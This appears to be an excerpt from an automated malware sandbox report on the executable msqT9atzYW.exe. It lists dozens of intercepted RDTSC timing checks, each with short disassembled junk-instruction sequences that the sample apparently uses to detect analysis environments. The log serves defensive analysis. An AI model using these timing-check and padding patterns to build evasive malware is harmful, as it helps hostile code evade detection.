                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E62016 second address: E62032 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F43C9098CE6h 0x00000008 jmp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6219C second address: E621BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E621BB second address: E621D8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43C9098CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CECh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E64D2A second address: E64D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E648DD second address: E648E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E648E5 second address: E648EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E648EA second address: E64919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F43C9098CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007F43C9098CF0h 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6A5D7 second address: E6A5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F43C8AE0076h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6A5E3 second address: E6A5F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43C9098CE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6A5F2 second address: E6A604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E114A7 second address: E114F1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d and cl, FFFFFFECh 0x00000010 mov ebx, dword ptr [ebp+124954C2h] 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F43C9098CE8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add eax, ebx 0x00000032 mov cx, E6D9h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jne 00007F43C9098CE6h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E114F1 second address: E1150D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6AF2F second address: E6AF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6AF40 second address: E6AF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F43C8AE0082h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6E75C second address: E6E786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF6h 0x00000007 push edx 0x00000008 jc 00007F43C9098CE6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push esi 0x00000014 push esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6E8F4 second address: E6E908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0076h 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6E908 second address: E6E90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EAA1 second address: E6EAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Ch 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EAB9 second address: E6EABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EE4F second address: E6EE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EE53 second address: E6EE79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C9098CE6h 0x00000008 jl 00007F43C9098CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F43C9098CF1h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EE79 second address: E6EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E6EE94 second address: E6EE9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73444 second address: E7344A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7344A second address: E73450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73450 second address: E73479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0083h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F43C8AE007Ch 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73479 second address: E73483 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43C9098CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73483 second address: E7348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F43C8AE0093h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73778 second address: E73795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73795 second address: E73799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73A85 second address: E73A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73BD8 second address: E73BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73BDE second address: E73BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73BE2 second address: E73BFB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 jnp 00007F43C8AE0076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007F43C8AE0076h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E73BFB second address: E73C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7CCD2 second address: E7CCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AC75 second address: E7AC93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C9098CF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AE03 second address: E7AE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AE07 second address: E7AE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AE0B second address: E7AE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0080h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AE26 second address: E7AE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43C9098CF0h 0x0000000b popad 0x0000000c jmp 00007F43C9098CEBh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AE4C second address: E7AE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AFA7 second address: E7AFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F43C9098CE6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007F43C9098CE6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AFBA second address: E7AFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AFC2 second address: E7AFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AFD0 second address: E7AFEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F43C8AE0084h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7AFEF second address: E7AFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7B542 second address: E7B548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7B548 second address: E7B54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7B8AF second address: E7B8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7B8C0 second address: E7B8DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CECh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jnp 00007F43C9098CE6h 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7BB85 second address: E7BB8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7BE6B second address: E7BE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7BE6F second address: E7BE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C0E3 second address: E7C0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C0E7 second address: E7C0F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C8AE0078h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C0F5 second address: E7C0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C0FB second address: E7C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C101 second address: E7C145 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F43C9098D05h 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 jp 00007F43C9098CF2h 0x0000001d js 00007F43C9098CE6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C6D9 second address: E7C6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C6DF second address: E7C6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F43C9098CECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E7C9E1 second address: E7C9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F43C8AE0076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F43C8AE0076h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E85E9D second address: E85EBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E850BD second address: E850DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C8AE0089h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E85941 second address: E85958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 jc 00007F43C9098CF6h 0x0000000c pushad 0x0000000d je 00007F43C9098CE6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E85BC3 second address: E85BC9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E85BC9 second address: E85BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E880A0 second address: E880A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8E855 second address: E8E85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8E85B second address: E8E85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8EE02 second address: E8EE07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8EE07 second address: E8EE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8EF67 second address: E8EF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F275 second address: E8F27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F27A second address: E8F27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F27F second address: E8F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F565 second address: E8F571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F43C9098CE6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F571 second address: E8F58C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E8F58C second address: E8F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E9700B second address: E97011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E97011 second address: E97017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E97017 second address: E97021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F43C8AE0076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E97021 second address: E9702E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96A97 second address: E96A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96A9B second address: E96AA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96AA6 second address: E96AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96AAD second address: E96AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96AB5 second address: E96AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96D2B second address: E96D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96D31 second address: E96D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96D39 second address: E96D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43C9098CECh 0x00000009 je 00007F43C9098CE6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: E96D51 second address: E96D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EA6A03 second address: EA6A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: EA6A10 second address: EA6A4D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43C8AE0076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F43C8AE0087h 0x0000000f jmp 00007F43C8AE0081h 0x00000014 popad 0x00000015 je 00007F43C8AE00B0h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
